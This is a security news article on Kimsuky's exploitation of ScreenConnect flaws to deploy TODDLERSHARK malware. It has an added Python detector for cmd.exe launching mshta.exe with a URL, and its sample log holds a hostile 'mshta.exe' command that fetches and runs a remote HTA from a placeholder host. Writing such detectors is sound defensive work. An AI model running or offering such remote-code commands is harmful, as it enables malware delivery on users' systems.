North Korean threat actors have exploited recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.
According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with well-known Kimsuky malware such as BabyShark and ReconShark.
“The threat actor gained access to the victim’s workstation by exploiting the ScreenConnect application setup wizard,” said security researchers Keith Wojcieszek, George Glass and Dave Truman.
“They then exploited their ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB)-based malware.”
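The execution chain described above (an interactive cmd.exe shell launching mshta.exe with a URL) is a high-signal pattern for process-creation telemetry. The following is an added detection example, not code from Kroll or the original article; it parses constructed log lines in a made-up `key=value|...` format and the URL in the sample is a placeholder, not an indicator from the report.

```python
"""Flag process-creation events matching the cmd.exe -> mshta.exe <URL> chain."""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def is_remote_hta_launch(ev: ProcEvent) -> bool:
    """True when mshta.exe is started with a URL on its command line."""
    if not ev.image.lower().endswith("\\mshta.exe"):
        return False
    return URL_RE.search(ev.command_line) is not None


def is_suspicious_chain(ev: ProcEvent) -> bool:
    """mshta.exe with a remote URL, spawned from an interactive cmd.exe shell."""
    return is_remote_hta_launch(ev) and ev.parent_image.lower().endswith("\\cmd.exe")


def parse_log(text: str) -> list[ProcEvent]:
    """Parse constructed 'key=value|...' lines (hypothetical format, not a real product's)."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(part.split("=", 1) for part in line.split("|"))
        events.append(ProcEvent(fields["host"], fields["parent"], fields["image"], fields["cmd"]))
    return events


# Constructed sample telemetry: one matching chain, one local HTA, one benign command.
SAMPLE_LOG = """
host=WS01|parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\mshta.exe|cmd=mshta.exe http://example.invalid/update.hta
host=WS01|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\mshta.exe|cmd=mshta.exe C:\\Tools\\local.hta
host=WS02|parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\whoami.exe|cmd=whoami
"""


def find_alerts(text: str = SAMPLE_LOG) -> list[str]:
    """Return 'host: command line' for every event that matches the chain."""
    return [f"{ev.host}: {ev.command_line}" for ev in parse_log(text) if is_suspicious_chain(ev)]


if __name__ == "__main__":
    for alert in find_alerts():
        print(alert)
```

In a real environment the parent check can be tightened further to require that cmd.exe itself descends from the ScreenConnect client process, since that is the access path the report describes.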
The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since been heavily exploited by numerous threat actors to deliver cryptocurrency miners, ransomware, remote access Trojans and stealer malware.
Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent of which are GoBear and Troll Stealer.
BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instructions from the operator.
Then, in May 2023, a variant of BabyShark called ReconShark was observed being delivered to specifically targeted individuals via spear-phishing emails. TODDLERSHARK is considered the latest evolution of the same malware due to similarities in code and behavior.
The malware, in addition to using a scheduled task for persistence, is designed to acquire and exfiltrate sensitive information about compromised hosts, thus serving as a valuable reconnaissance tool.
TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing code location via generated junk code, and using uniquely generated C2 URLs, which could make this malware difficult to detect in some environments,” the researchers said.
The development comes as South Korea’s National Intelligence Service (NIS) accused its Northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and stealing valuable data.
The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted vulnerable, internet-exposed servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than deploying malware to better evade detection.
“North Korea may have begun preparations for its own semiconductor production due to difficulties in sourcing semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS said.